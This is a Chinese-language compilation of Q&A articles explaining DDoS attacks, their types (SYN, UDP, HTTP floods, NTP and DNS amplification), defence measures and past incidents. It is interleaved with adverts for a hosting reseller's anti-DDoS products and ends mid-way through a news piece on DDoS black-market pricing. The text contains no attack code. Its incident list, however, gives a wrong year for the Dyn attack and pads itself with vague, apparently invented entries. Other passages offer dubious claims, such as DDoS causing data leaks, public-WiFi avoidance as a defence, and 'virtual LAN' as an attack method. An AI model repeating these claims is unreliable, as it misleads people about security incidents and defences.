DDOS攻击是一种非法的网络攻击行为,违反了网络安全和道德规范。DDOS攻击者通过各种方式来攻击网站,包括但不限于以下方式:流量攻击:DDOS攻击者可以向目标网站发送大量的请求,导致服务器超载,网站崩溃或瘫痪。资源消耗:DDOS攻击者可以消耗大量的网络带宽和服务器资源,导致网站无法正常运作。拒绝服务:DDOS攻击者可以向目标网站发送大量的请求,导致服务器无法响应正常的请求,从而造成网站无法访问。漏洞攻击:DDOS攻击者可以利用网站存在的漏洞,如安全漏洞、配置错误等,从而获取对网站的访问权限,并进行攻击。木马植入:DDOS攻击者可以向目标网站植入木马,获取对网站的访问权限,并进行攻击。需要注意的是,DDOS攻击是一种非法行为,可能会导致网站无法访问,并且可能会损害用户的个人信息和隐私。因此,我们应该遵守网络安全和道德规范,保护自己的合法权益。 #### ddos攻击怎么防护 什么是DDoS攻击? DDoS攻击(分布式拒绝服务攻击)是一种网络攻击,攻击者试图通过向目标网络或服务器发送大量的请求,使其无法正常工作。攻击者通常使用一个或多个网络中的计算机或设备来协同攻击,这些设备被称为“僵尸计算机”或“僵尸网络”。 DDoS攻击是一种常见的网络攻击方式,可以对网络服务、网站、电子商务和金融交易等应用程序造成重大影响。攻击者通常会要求目标系统支付“保护费”或者是出于其他目的进行攻击,如垄断竞争等。 DDoS攻击的类型 DDoS攻击的类型包括以下几种: UDP Flood攻击:UDP(用户数据报协议)是一种无连接协议,攻击者可以向目标服务器发送大量的UDP数据包,从而使目标服务器无法处理其他请求。 SYN Flood攻击:SYN(同步)是TCP(传输控制协议)连接的开始,攻击者可以向目标服务器发送大量的SYN请求,但不会完成握手过程,从而使目标服务器无法响应其他请求。 ICMP Flood攻击:ICMP(Internet控制消息协议)是一种用于通知错误和信息的协议,攻击者可以向目标服务器发送大量的ICMP数据包,从而使目标服务器无法正常响应。 HTTP Flood攻击:攻击者可以模拟大量的HTTP请求,例如访问网站、下载文件等,从而使目标服务器无法响应其他请求。 DDoS攻击的防护措施 为了防止DDoS攻击,我们可以采取以下措施: 增加网络带宽:DDoS攻击旨在消耗目标系统的网络带宽,因此增加网络带宽可以缓解这种攻击。但是,这只是一种短期的解决方案,因为攻击者可以继续增加攻击流量。 使用防火墙和入侵防御系统:防火墙和入侵防御系统可以检测和阻止DDoS攻击流量,以及控制入站和出站流量。防火墙可以配置为限制网络流量,并拦截来自未知源的流量。 使用负载均衡器:负载均衡器可以将流量分散到多个服务器上,从而分散攻击流量,减轻攻击的影响。 限制IP地址和端口号:限制IP地址和端口号可以防止攻击者发送伪造的IP地址和端口号,从而避免目标系统受到DDoS攻击。这可以通过防火墙、入侵防御系统和路由器等网络设备来实现。 采用流量过滤器:流量过滤器可以检测和阻止DDoS攻击流量,并过滤掉与目标系统无关的流量。流量过滤器可以在网络边缘或内部放置,以控制进入和离开网络的流量。 使用CDN(内容分发网络):CDN是一种将内容分发到全球多个节点的服务,可以缓存和分发静态内容(如图片、视频和文本)。CDN可以帮助减轻DDoS攻击对目标系统的影响,并提高网站的性能和可用性。 更新系统和应用程序:定期更新系统和应用程序可以修补已知的漏洞和安全问题,并增强系统的安全性。这可以减少DDoS攻击的风险,并使系统更加安全和可靠。 建立应急响应计划:建立应急响应计划可以帮助组织应对DDoS攻击和其他网络安全事件。应急响应计划应包括评估风险、建立报警机制、调查和分析事件、修复漏洞和恢复系统等步骤。 DDoS攻击是一种常见的网络攻击,可以对网络服务、网站、电子商务和金融交易等应用程序造成重大影响。为了防止DDoS攻击,可以采取一系列措施,包括增加网络带宽、使用防火墙和入侵防御系统、使用负载均衡器、限制IP地址和端口号、采用流量过滤器、使用CDN、更新系统和应用程序、建立应急响应计划等。这些措施可以帮助组织提高网络安全性,减少DDoS攻击的风险。 总结 DDoS攻击是一种常见的网络攻击,可以对网络服务、网站、电子商务和金融交易等应用程序造成重大影响。为了防止DDoS攻击,可以采取一系列措施,包括增加网络带宽、使用防火墙和入侵防御系统、使用负载均衡器、限制IP地址和端口号、采用流量过滤器、使用CDN、更新系统和应用程序、建立应急响应计划等。这些措施可以帮助组织提高网络安全性,减少DDoS攻击的风险。 #### ddos攻击是什么 如何防御 举个形象的例子你就明白了: 某饭店可以容纳100人同时就餐,某日有个商家恶意竞争,雇佣了200人来这个饭店坐着不吃不喝,导致饭店满满当当无法正常营业。(DDOS攻击成功) 老板当即大怒,派人把不吃不喝影响正常营业的人全都轰了出去,且不再让他们进来捣乱,饭店恢复了正常营业。(添加规则和黑名单进行DDOS防御,防御成功) 主动攻击的商家心存不满,这次请了五千人逐批次来捣乱,导致该饭店再次无法正常营业。(增加DDOS流量,改变攻击方式) 饭店把那些捣乱的人轰出去只后,另一批接踵而来。此时老板将饭店营业规模扩大,该饭店可同时容纳1万人就餐,5000人同时来捣乱饭店营业也不会受到影响。(增加硬防与其抗衡) DDOS是Distributed Denial of Service的缩写,翻译成中文是“分布式拒绝服务“攻击,网络中的DDOS攻击与防御与上面例子所述差不多,DDOS只不过是一个概称,其下有各种攻击方式,比如“CC攻击、SYN攻击、NTP攻击、TCP攻击、DNS攻击等等”,现在DDOS发展变得越来越可怕,NTP攻击渐渐成为主流了,这意味着可以将每秒的攻击流量放大几百倍,比如每秒1G的SYN碎片攻击换成NTP放大攻击,就成为了200G或者更多。 重大DDOS攻击案例: 2000年2月,包括雅虎、CNN、亚马逊、eBay、Buy.com、ZDNet,以及E*Trade和Datek等网站均遭受到了DDOS攻击,并致使部分网站瘫痪。 2007年5月,爱沙尼亚三周内遭遇三轮DDOS攻击,总统府、议会、几乎全部政府部门、主要政党、主要媒体和2家大银行和通讯公司的网站均陷入瘫痪,为此北约顶级反网络恐怖主义专家前往该国救援。 2009年519断网事件导致南方六省运营商服务器全部崩溃,电信在南方六省的网络基本瘫痪。 2009年7月,韩国主要网站三天内遭遇三轮猛烈的DDOS攻击,韩国宣布提前成立网络司令部。 最近比较著名的案例有:全球三大游戏平台:暴雪战网、Valve Steam和EA Origin遭到大规模DDoS攻击,致使大批玩家无法登录与进行游戏。随后名为DERP的黑客组织声称对此次大规模的DDoS攻击行动负责。 可以说,DDoS是目前最凶猛、最难防御的网络攻击之一。现实情况是,这个世界级难题还没有完美的、彻底的解决办法,但采取适当的措施以降低攻击带来的影响、减少损失是十分必要的。将DDoS防御作为整体安全策略的重要部分来考虑,防御DDoS攻击与防数据泄露、防恶意植入、反病毒保护等安全措施同样不可或缺。 不得不得提的是,防御DDoS攻击是一个系统的工程。防御DDoS应该根据攻击流量大小等实际情况灵活应对,采取多种组合,定制策略才能更好地实现防御效果。毕竟,攻击都流行走混合路线了,防御怎么还能一种功夫包打全能。 由于DDoS攻击和防御都面临着成本开支,当我们的防御强度逐步增加,攻击成本也对应上升,当大部分攻击者无法持续而选择放弃,那防御就算成功了。也因此我们需要明白,防御措施、抗D服务等都只是一种“缓解”疗法,而不是一种“治愈”方案,我们谈防御是通过相应的举措来减少DDoS攻击对企业业务的影响,而不是彻底根除DDoS攻击。 基于以上,我们将从三个方面(网络设施、防御方案、预防手段)来谈谈抵御DDoS攻击的一些基本措施、防御思想及服务方案。 一.网络设备设施 网络架构、设施设备是整个系统得以顺畅运作的硬件基础,用足够的机器、容量去承受攻击,充分利用网络设备保护网络资源是一种较为理想的应对策略,说到底攻防也是双方资源的比拼,在它不断访问用户、夺取用户资源之时,自己的能量也在逐渐耗失。相应地,投入资金也不小,但网络设施是一切防御的基础,需要根据自身情况做出平衡的选择。 1. 扩充带宽硬抗 网络带宽直接决定了承受攻击的能力,国内大部分网站带宽规模在10M到100M,知名企业带宽能超过1G,超过100G的基本是专门做带宽服务和抗攻击服务的网站,数量屈指可数。但DDoS却不同,攻击者通过控制一些服务器、个人电脑等成为肉鸡,如果控制1000台机器,每台带宽为10M,那么攻击者就有了10G的流量。当它们同时向某个网站发动攻击,带宽瞬间就被占满了。增加带宽硬防护是理论最优解,只要带宽大于攻击流量就不怕了,但成本也是难以承受之痛,国内非一线城市机房带宽价格大约为100元/M*月,买10G带宽顶一下就是100万,因此许多人调侃拼带宽就是拼人民币,以至于很少有人愿意花高价买大带宽做防御。 2. 使用硬件防火墙 许多人会考虑使用硬件防火墙,针对DDoS攻击和黑客入侵而设计的专业级防火墙通过对异常流量的清洗过滤,可对抗SYN/ACK攻击、TCP全连接攻击、刷脚本攻击等等流量型DDoS攻击。如果网站饱受流量攻击的困扰,可以考虑将网站放到DDoS硬件防火墙机房。但如果网站流量攻击超出了硬防的防护范围(比如200G的硬防,但攻击流量有300G),洪水瞒过高墙同样抵挡不住。值得注意一下,部分硬件防火墙基于包过滤型防火墙修改为主,只在网络层检查数据包,若是DDoS攻击上升到应用层,防御能力就比较弱了。 3. 选用高性能设备 除了防火墙,服务器、路由器、交换机等网络设备的性能也需要跟上,若是设备性能成为瓶颈,即使带宽充足也无能为力。在有网络带宽保证的前提下,应该尽量提升硬件配置。 二、有效的抗D思想及方案 硬碰硬的防御偏于“鲁莽”,通过架构布局、整合资源等方式提高网络的负载能力、分摊局部过载的流量,通过接入第三方服务识别并拦截恶意流量等等行为就显得更加“理智”,而且对抗效果良好。 4. 负载均衡 普通级别服务器处理数据的能力最多只能答复每秒数十万个链接请求,网络处理能力很受限制。负载均衡建立在现有网络结构之上,它提供了一种廉价有效透明的方法扩展网络设备和服务器的带宽、增加吞吐量、加强网络数据处理能力、提高网络的灵活性和可用性,对DDoS流量攻击和CC攻击都很见效。CC攻击使服务器由于大量的网络传输而过载,而通常这些网络流量针对某一个页面或一个链接而产生。在企业网站加上负载均衡方案后,链接请求被均衡分配到各个服务器上,减少单个服务器的负担,整个服务器系统可以处理每秒上千万甚至更多的服务请求,用户访问速度也会加快。 5. CDN流量清洗 CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率,因此CDN加速也用到了负载均衡技术。相比高防硬件防火墙不可能扛下无限流量的限制,CDN则更加理智,多节点分担渗透流量,目前大部分的CDN节点都有200G 的流量防护功能,再加上硬防的防护,可以说能应付目绝大多数的DDoS攻击了。这里我们推荐一款高性比的CDN产品:百度云加速,非常适用于中小站长防护。 6. 分布式集群防御 分布式集群防御的特点是在每个节点服务器配置多个IP地址,并且每个节点能承受不低于10G的DDoS攻击,如一个节点受攻击无法提供服务,系统将会根据优先级设置自动切换另一个节点,并将攻击者的数据包全部返回发送点,使攻击源成为瘫痪状态,从更为深度的安全防护角度去影响企业的安全执行决策。 三.预防为主保安全 DDoS的发生可能永远都无法预知,而一来就凶猛如洪水决堤,因此网站的预防措施和应急预案就显得尤为重要。通过日常惯性的运维操作让系统健壮稳固,没有漏洞可钻,降低脆弱服务被攻陷的可能,将攻击带来的损失降低到最小。 7. 筛查系统漏洞 及早发现系统存在的攻击漏洞,及时安装系统补丁,对重要信息(如系统配置信息)建立和完善备份机制,对一些特权账号(如管理员账号)的密码谨慎设置,通过一系列的举措可以把攻击者的可乘之机降低到最小。计算机紧急响应协调中心发现,几乎每个受到DDoS攻击的系统都没有及时打上补丁。统计分析显示,许多攻击者在对企业的攻击中获得很大成功,并不是因为攻击者的工具和技术如何高级,而是因为他们所攻击的基础架构本身就漏洞百出。 8. 系统资源优化 合理优化系统,避免系统资源的浪费,尽可能减少计算机执行少的进程,更改工作模式,删除不必要的中断让机器运行更有效,优化文件位置使数据读写更快,空出更多的系统资源供用户支配,以及减少不必要的系统加载项及自启动项,提高web服务器的负载能力。 9. 过滤不必要的服务和端口 就像防贼就要把多余的门窗关好封住一样,为了减少攻击者进入和利用已知漏洞的机会,禁止未用的服务,将开放端口的数量最小化就十分重要。端口过滤模块通过开放或关闭一些端口,允许用户使用或禁止使用部分服务,对数据包进行过滤,分析端口,判断是否为允许数据通信的端口,然后做相应的处理。 10. 限制特定的流量 检查访问来源并做适当的限制,以防止异常、恶意的流量来袭,限制特定的流量,主动保护网站安全。 对抗DDoS攻击是一个涉及很多层面的问题,抗DDoS需要的不仅仅是一个防御方案,一个设备,更是一个能制动的团队,一个有效的机制。我们都听过一句话——god helps those who help themselves. 天助自助者。因此,面对攻击大家需要具备安全意识,完善自身的安全防护体系才是正解。随着互联网业务的越发丰富,可以预见DDoS攻击还会大幅度增长,攻击手段也会越来越复杂多样。安全是一项长期持续性的工作,需要时刻保持一种警觉,更需要全社会的共同努力。 #### DDOS攻击是什么,遇到DDOS攻击怎么防御? DDOS攻击是分布式拒绝服务攻击(Distributed denial of service attack)的简称。它是一种可以使很多计算机(或服务器)在同一时间遭受攻击,使被攻击的目标无法正常使用的一种网络攻击方式 。DDoS攻击通常会利用多个计算机或设备组成的“僵尸网络”,也叫“僵尸军团”或“僵尸群”,向目标服务器发起攻击。常见的DDoS攻击方式包括带宽攻击、连接攻击和应用层攻击。 遇到DDOS攻击要怎么防御? DDOS防御无法通过普通服务器防御,只能购买专业的防御进行防御,目前DDOS防御服务主要有三种: 1.高防服务器 高防服务器主要是指独立单个硬防防御50G以上的服务器,可以为单个客户提供安全维护。这类服务器具有拒绝服务攻击的能力,并且可以定时扫描现有的网络主节点,查找可能存在的安全漏洞。高防服务器通常采用品牌服务器,能够更加稳定运行,并且在IDC机房出口处架设了专门的硬件防火墙设备以及流量清洗牵引设备等,用来防御常见的CC攻击、DDOS、SYN攻击。 主机吧这里优惠出售 配置地区:华北高防一区CPU : 8 核内存: 16G带宽: 50Mbps防御值: 400GB系统盘: 50G数据盘: 100G月付:1600元 2.高防IP 高防IP是针对互联网服务器遭受大流量的DDoS攻击导致服务不可用的情况下,推出的付费增值服务。用户可以在数据不转移的情况下,通过配置高防IP,将攻击流量引流到高防IP,确保源站的稳定可靠。高防IP可以防御SYN Flood、UDP Flood、ICMP Flood、IGMP Flood、ACK Flood、Ping Sweep、CC 等攻击,但不限于这些类型。 主机吧优惠出售:地 区:华北带宽:50Mbps防御值:100GB独享IP:1个防护域名数:2个业务QPS:10000防护端口数:5个月付:594元 3.高防CDN 高防CDN是内容分流网络流量防御,它是在网络之上构建的内容分发网络,通过在边缘服务器上部署负载均衡、内容分发、调度等功能模块,使用户可以就近获取所需内容,而不用直接访问网站源服务器。高防CDN可以解决跨运营商访问难的问题,提高网站的稳定性,加速访问,并且隐藏源站IP,防止黑客获取源站真实IP。高防CDN的原理简单的说就是架设多个高防CDN节点,当有CDN节点攻击的时候各个节点共同承受,不会因为一个节点被攻击打死而导致网站无法访问,同时还可以隐藏网站源IP。 主机吧优惠出售百度云加速、京东云星盾等高防CDN,需要的咨询。 #### ddos攻击是利用什么进行攻击 DDoS(分布式拒绝服务)攻击主要通过以下手段和技术发起攻击: 1. 利用僵尸网络(Botnet) 僵尸网络是攻击者控制的大量被感染设备(如电脑、服务器、IoT设备),通过恶意软件远程操控。 攻击方式:同时向目标发送海量请求(如HTTP请求、TCP连接),耗尽目标资源(带宽、处理能力)。 2. 利用协议漏洞或公开服务 反射/放大攻击: 反射:伪造目标IP地址,向公开服务器(如DNS、NTP、SSDP)发送请求,服务器将更大响应发送到目标。 放大:利用协议设计缺陷(如DNS响应比请求大数十倍),成倍放大攻击流量。 常见协议:DNS、NTP、CLDAP、Memcached、SNMP。 3. 资源耗尽策略 网络层攻击: SYN Flood:发送大量伪造的TCP连接请求(SYN包),耗尽目标服务器的连接资源。 UDP Flood:发送大量UDP数据包,占用目标带宽和处理能力。 应用层攻击: HTTP Flood:模拟大量合法用户请求(如频繁访问网页),耗尽服务器资源。 Slowloris:保持与服务器的长时间连接但不完成请求,占用连接池。 4. 利用云服务或IoT设备 云服务器:攻击者滥用高带宽云服务生成更大流量。 IoT设备:利用安全性弱的智能设备(摄像头、路由器)组建僵尸网络。 5. 多层攻击组合 混合多种攻击类型(如同时发起流量洪水和协议漏洞攻击),增加防御难度。 防御难点 流量伪装:攻击流量模拟正常用户,难以区分。 分布式来源:攻击来自全球各地,难以封锁单一IP。 规模庞大:攻击流量可达Tbps级别,远超普通网络承载能力。 DDoS攻击本质是通过分布式、协作式的资源滥用,使目标系统过载而无法正常服务。防御需结合流量清洗、协议优化、行为分析等多层策略。 #### ddos攻击是无解的吗? 硬刚成本太高了,所以安全公司想了一种成本相对便宜的方案,就是使用分布式防御。 也就是高防CDN,通过接入高防CDN后,CDN会根据访问地区、网络运营商分配边缘IP节点,隐藏源服务器IP,黑客只能攻击高防CDN节点,而高防CDN节点被攻击后会自动下线,切换新的节点。 效果就是访客访问至被攻击节点的时候会出现短暂无法访问的情况,一般5分钟左右,CDN会自动切换至新的节点,而其它未被DDOS的CDN节点访问是不受影响的。 从而实现即使被DDOS攻击,也不会出现大部份地区无法访问的情况,以减少DDOS带来的损失。 而且高防CDN不仅可以边缘缓存加速的效果,同果也具有云防火墙,可以对CC攻击进行拦截,实现DDOS、CC防御的效果,可以说是低成本防御DDOS攻击的最佳方案。 有需要的可以看下京东云星盾高防CDN :https://zhujib.com/jdxingdun.html 当然,还有一种是购买高防IP硬刚,但想要完全不受影响,得黑客攻击多少量峰值,你就得比他高,但我们要知道,道高一尺魔高一丈的说法,在黑客界是适用的,也就是不管你防御多高,攻击永远会比你的防御高,而且成本肯定比你防御便宜。 所以主机吧建议如果不是那种分分钟几十万的业务,可以买那种高防IP黑洞后,恢复特别快的。一般十几分钟就自动解封恢复的,这样可以减少损失。 #### DDOS攻击来了怎么办? 如果遭受DDOS攻击,以下是一些应对措施: 1.更换高防服务器 高防服务器是一种专门设计用于抵御DDoS攻击和其他网络攻击的服务器。相比于普通服务器,高防服务器具有更高的带宽、更强大的硬件配置和更专业的安全防护措施,可以有效地过滤掉恶意流量,保护网站或应用程序免受攻击的影响。 高防服务器通常采用多种技术来防御DDoS攻击,包括:黑名单过滤、IP封锁、流量清洗、数据压缩等。此外,高防服务器还可以提供实时监控和报警服务,以及定期的安全报告和分析,帮助企业快速发现并解决潜在的安全问题。 2.切换高防CDN 高防CDN(Content Delivery Network with High Defense)是一种结合了内容分发网络(CDN)和DDoS防护技术的服务。它可以提供与普通CDN相同的加速和负载均衡功能,同时还可以过滤掉恶意流量,保护网站或应用程序免受DDoS攻击的影响。 相比于普通的CDN服务,高防CDN具有更高的防御能力,可以有效地抵御各种类型的DDoS攻击,包括SYN Flood、UDP Flood、ICMP Flood等。此外,高防CDN还可以通过多种技术手段对攻击流量进行清洗和过滤,从而保证用户可以正常访问网站或应用程序。 3.使用高防IP 高防IP是一种专门设计用于抵御DDoS攻击和其他网络攻击的互联网服务。相比于普通IP,高防IP具有更高的带宽、更强大的硬件配置和更专业的安全防护措施,可以有效地过滤掉恶意流量,保护网站或应用程序免受攻击的影响。 高防IP通常采用多种技术来防御DDoS攻击,包括:黑名单过滤、IP封锁、流量清洗、数据压缩等。此外,高防IP还可以提供实时监控和报警服务,以及定期的安全报告和分析,帮助企业快速发现并解决潜在的安全问题。 需要注意的是,DDoS攻击是一种非常危险的攻击方式,可能会导致严重的后果。如果您的网站或服务器遭受DDoS攻击,请务必及时采取措施,如需要帮助可联系主机吧,主机吧提供高防服务器、高防IP、高防CDN等专业服务。 #### DDOS攻击的例子是什么 分布式拒绝服务(DDoS)攻击是一种非常危险的网络安全威胁,可能导致网站或系统崩溃,服务中断和数据泄露。以下是一些DDoS攻击的例子: 2016年美国东海岸断网事件:这是一起非常严重的DDoS攻击事件,多家互联网服务提供商和网站(包括亚马逊、苹果、银行和新闻机构)遭受了攻击,导致服务中断和数据泄露。 2019年针对GitHub的DDoS攻击:GitHub是一个流行的代码托管平台,2019年它遭受了DDoS攻击,导致其服务中断。 2019年针对Netflix的DDoS攻击:Netflix是一个流行的在线视频平台,2019年它遭受了DDoS攻击,导致其服务中断。 2019年针对DNS服务器提供商Dyn的DDoS攻击:Dyn是一家DNS服务器提供商,2019年它遭受了DDoS攻击,导致其服务中断。 2020年针对GitHub的DDoS攻击:在同一年,GitHub再次遭受了DDoS攻击,导致其服务中断。 2020年针对游戏服务器厂的DDoS攻击:游戏服务器厂是一家为在线游戏提供服务的企业,2020年它遭受了DDoS攻击,导致游戏服务中断。 2020年针对 dating 网站的DDoS攻击: dating 网站是一种流行的约会平台,2020年它遭受了DDoS攻击,导致其服务中断。 2020年针对电子商务平台的DDoS攻击:电子商务平台是一种流行的在线购物平台,2020年它遭受了DDoS攻击,导致其服务中断。 2020年针对社交媒体平台的DDoS攻击:社交媒体平台是一种流行的在线社交平台,2020年它遭受了DDoS攻击,导致其服务中断。 2020年针对金融平台的DDoS攻击:金融平台是一种流行的在线交易平台,2020年它遭受了DDoS攻击,导致其服务中断。 从以上例子可以看出,DDoS攻击的危害是非常大的,它们能够使目标网站或系统崩溃,导致服务中断和数据泄露。因此,我们应该采取一些措施来预防和应对DDoS攻击。例如,可以设置强密码、使用防火墙、不使用公共WiFi网络、定期更新软件和系统等,并准备好应对预案以应对可能发生的DDoS攻击。 #### DDOS攻击的原理是什么 DDoS攻击的原理是什么? 随着网络技术的不断发展,网络安全问题已经成为企业和个人必须面对的严峻挑战。其中,分布式拒绝服务(DDoS)攻击是一种最常见的网络攻击。了解DDoS攻击的原理及防范措施,是保障网络安全的关键。本文将详细介绍DDoS攻击的原理和防范措施,以期帮助大家更好地认识和应对这种威胁。 一、DDoS攻击的定义和背景 DDoS攻击是一种最常见的网络攻击,其目的是通过向目标服务器发送大量的无效请求或数据包,从而使其无法正常响应真实请求。DDoS攻击具有分布式、海量请求和恶意攻击等特点,使得服务器难以应对,从而造成服务中断和系统瘫痪等严重后果。 二、DDoS攻击的原理 攻击者获取目标端口 在DDoS攻击开始之前,攻击者会通过各种方式获取目标服务器的端口信息。常见的手段包括扫描器、脆弱系统和服务扫描等。通过获取目标端口,攻击者可以进一步了解目标服务器的服务和漏洞情况,从而发起更有针对性的攻击。 对目标进行DDoS攻击 一旦攻击者获取了目标端口的信息,就会开始对目标进行DDoS攻击。攻击者会利用各种工具和服务,如僵尸网络、大量代理服务器等,以发送大量的无效请求或数据包。这些请求或数据包会占用目标服务器的带宽和资源,导致服务器无法正常响应真实请求,最终造成系统瘫痪和服务中断。 目标服务器如何应对 面对海量的无效请求或数据包,目标服务器会尝试处理这些请求或数据包,以便正常响应真实请求。然而,由于请求或数据包的数量巨大,目标服务器的处理能力被极大地占用,导致服务器无法正常处理真实请求。为了应对这种情况,目标服务器通常会采取限流等措施,如限制请求频率、限制访问来源等。这些措施虽然可以有效减轻DDoS攻击的影响,但也会影响正常用户的访问。 三、DDoS攻击的常见手段 大量并发连接:攻击者利用大量并发连接,占用目标服务器的资源,导致服务器无法正常响应真实请求。 虚拟局域网:攻击者利用虚拟局域网技术,将不同地理位置的主机组织成一个虚拟网络,以便于管理和发送攻击流量。 僵尸网络:攻击者利用僵尸网络,将大量被感染的主机组成一个僵尸网络,协同完成DDoS攻击。 域名系统缓存污染:攻击者利用域名系统缓存污染技术,将虚假IP地址与目标服务器的IP地址映射,从而拦截真实请求。 分布式反射式拒绝服务攻击:攻击者利用DNS服务器的漏洞,向目标发送大量反射式请求,从而造成DDoS攻击的效果。 四、DDoS攻击的防范措施 优化服务器性能:提高服务器处理能力和响应速度,减少服务器被DDoS攻击打垮的可能性。 网络安全管理:建立完善的网络安全管理制度,设置安全策略和访问控制,对网络流量进行监控和分析。 DDoS防火墙:使用专业的DDoS防火墙设备,对网络流量进行过滤和分析,识别并拦截止止DDoS攻击流量。 定期扫描和修补漏洞:定期对服务器进行安全扫描和漏洞修补,减少被攻击者利用的可能性。 建立应急预案:制定完善的DDoS攻击应急预案,及时发现和处理DDoS攻击,尽快恢复网络服务。 五、结论 DDoS攻击是一种常见的网络安全威胁,其原理是通过发送大量无效请求或数据包,占用目标服务器的资源,导致服务器无法正常响应真实请求。了解DDoS攻击的原理和防范措施,是保障网络安全的关键。企业和个人应采取相应的安全措施,提高网络安全意识和应对能力,以应对日益复杂的网络安全威胁。 参考文献: 《DDoS攻击原理与实战解析》,吴穹、张焕腾著,电子工业出版社,2012年。 《网络安全攻防实战》,傅鑫、张勤、杨明轩编著,机械工业出版社,2019年。 《网络安全技术实战详解》,杨明、李晓军、陈妍著,清华大学出版社,2018年。 #### DDOS攻击的工作原理是什么? DDoS攻击是一种网络攻击,它的目的是通过向目标服务器发送大量的恶意流量,使其无法正常响应合法用户的请求,从而使其无法提供正常的服务。这种攻击通常是由一群黑客发起的,旨在利用漏洞并破坏目标服务器的可用性。 DDoS攻击的工作原理是,攻击者通过控制向目标服务器发送大量的恶意流量,通常是伪造的请求或无用的数据包,以使其无法处理正常的请求。这种攻击通常会占用目标服务器的所有可用带宽和资源,导致其无法处理合法用户的请求。 DDoS攻击的发起原因可能是出于各种目的,例如,政治动机、经济动机或恶作剧等。攻击者通常会利用漏洞或安全漏洞来发起攻击,或者通过购买DDoS服务来实施攻击。 DDoS攻击的流程和结构通常是复杂的,包括攻击者使用的各种工具和手段。攻击者可能会使用多线程攻击、基于IP地址的攻击、伪造请求等手段来发起攻击。这些手段可以导致目标服务器上的服务器软件或应用程序崩溃,从而使其无法提供正常的服务。 为了防范DDoS攻击,可以采取各种措施,例如提高网络安全意识、加强密码策略、设置防火墙、使用防DDoS设备等。这些措施可以帮助保护服务器免受DDoS攻击的影响,并确保其服务的可用性和安全性。 总之,DDoS攻击是一种严重的网络威胁,它可能会对目标服务器造成严重的损害。了解DDoS攻击的工作原理和防范措施是保护服务器免受这种威胁的关键。未来,随着技术的发展和网络威胁的不断演变,我们需要继续关注和研究新的DDoS攻击手段和防范措施。 #### DDoS攻击的成本:50块钱就能击瘫一家网站 前几天阿里旺旺、千牛、钉钉出现登陆不上的现象,据说是遭到了DDoS攻击,系统流量突然增大导致的。DDoS是一种在互联网地下非常常见的攻击方式,可以称作黑客入门的基础技巧。但要做到搞垮阿里这种规模的公司——攻击量流量起码得每秒100G以上,这是一个相当庞大的数值。但这起事件,除了阿里云主动传播的声明外,并未有更多讨论,也没有后续进展。这让整个事情看起来很奇怪,沉默的被攻击方,猖獗的攻击者,飞速发展的DDoS产业。雷锋网联络到加速乐产品经理西盟以及一位不具名的安全人士,就此事和背后的DDoS黑产链进行分析解读。450G流量为何“消无声息”每一次大规模DDoS,在互联网上都可以算是大事件,因为它总能闹出大动静。例如2013年3月创记录的300Gbps,Spamhaus、CloudFlare遭到攻击,被评价为“差点瘫痪欧洲网络”;2014年2月创纪录的400Gbps,攻击对象为CloudFlare客户,据称当时包括4chan、维基解密在内的78.5万个网站安全服务受到影响。但这次的450Gbps+的流量,如果不是阿里云主动公示,可能就此盖过无人知晓。为何反差如此巨大呢?安全专家西盟认为,本次攻击是直接针对阿里云服务器的。因为没有造成骨干网络的异常,外人观察不到这一现象,所以感觉没有动静。“450G是个很大的值,据我们了解,国内一些中小城市总的带宽也不一定有450G,也就是说如果有这么大的流量打到某个城市的IP上,这个城市就要断网了。”但如果是攻击北京、上海等国家级网络节点的话,要造成骨干网影响还不够,它们的带宽很高。阿里云的机房分布很多,450G流量不一定是集中打某个机房,分散到每个机房,量可能并不是非常大。“野蛮粗暴”的DDoSDDoS之所以能动辄网站失联、服务瘫痪,造成巨大影响,原因在于它简单直接,直接攻击在底层连接上。西盟称,DDoS攻击是一种很野蛮的攻击方式。一些黑客通过技术手段控制了一些服务器、个人电脑后,他们只需要在这些设备上植入DDoS攻击程序,即可打击互联网上任意一目标。以往一个黑客要入侵一个网站,一般要经过技术分析、查找漏洞、实施入侵等一系列工作。但这并不总是有效的,如果一些网站代码、服务器安全加固较好的话,这类技术入侵也无计可施。但DDoS就不一样了,比如黑客控制了1000台机器,这些机器每个带宽是10M,那么相当于黑客有了10G的流量,当它控制这些机器同时向某一网站发起流量攻击时,目标网站可能瞬间带宽被占满,而无法访问。据了解,国内的绝大多数的网站都是10M、100M规模的带宽,超过1G带宽的只有那些互联网上非常知名的企业才会有。超过100G的,除过国内一些做IDC带宽服务的、以及像加速乐这样专门做抗攻击服务的,算下来估计在互联网企业中不超过20家企业。所以超大流量打过来,企业自身一般没有任何办法。谁被控制?谁被攻击?被控制的机器,在黑客圈子里叫做“肉鸡”。在去年,加速乐曾基于防御平台上的数据进行统计,其中发起攻击的IP(肉鸡)中,79.7%是服务器,其它较为零散,有个人电脑、路由器等。服务器多是有原因的,因为在当下,服务器比个人电脑更容易入侵。原因很简单,服务器上需要部署各种Web服务,要允许远程访问,并经常有新的Web服务漏洞、系统漏洞爆出,这些任意一个问题都可以使它沦为肉鸡。反而个人电脑则没有这么多对外接口,攻击控制它相对麻烦很多。利用这些肉鸡的人,被称作黑产从业者(搞黑产)。他们通常受利益驱动,或主动或受雇佣,去攻击一些高盈利行业。西盟透露,一般像游戏、博彩、互联网金融等行业很容易发生DDoS攻击,这次阿里云上的历史记录,也是发生在游戏行业。而目前这类黑客攻击成本很低,已经形成了产业链,一些黑客明码标价。比如,打1G的流量到一个网站一小时,网上报价只需50块钱。前不久就有报道一个P2P网贷的网站CEO为了打击竞争对手雇佣黑客DDOS攻击,导致对方业务全线瘫痪。10Mb和10Gbps,DDoS规模化上限10Mb,是目前机房服务器最常见的带宽,攻击者手中最容易看到的肉鸡。10Gbps,是目前互联网公司大概的防御上限值,只有数家巨头有能力抵御而不受影响。10Gbps这个数不太好理解,可以从成本角度来看。国内二线城市机房带宽价格,1G大概30万,10G大概300万。一线城市类似北京,这个价格还得乘以10。价格是企业难以承受之痛,平常可能网站只用过10-100Mbps,很少有公司愿意花高价格去买大带宽做防御。由于少有新的攻防技术出现,观察DDoS行业最直观的指标就是这两个数值。西盟称,要凑齐10Gb流量,大概需要1000台肉鸡,这算是一个较有门槛的水平了。一般第三方安全防护服务提供方都是以10Gbps作为提醒的标准。不过10Gbps以上的攻击同样不少见。另一家网站安全防护服务提供方的安全专家告诉雷锋网,其每月大概能检测到10-20次10Gbps以上的DDoS攻击,其中大约2-3次超过40Gbps。而随着宽带不断发展,我们可以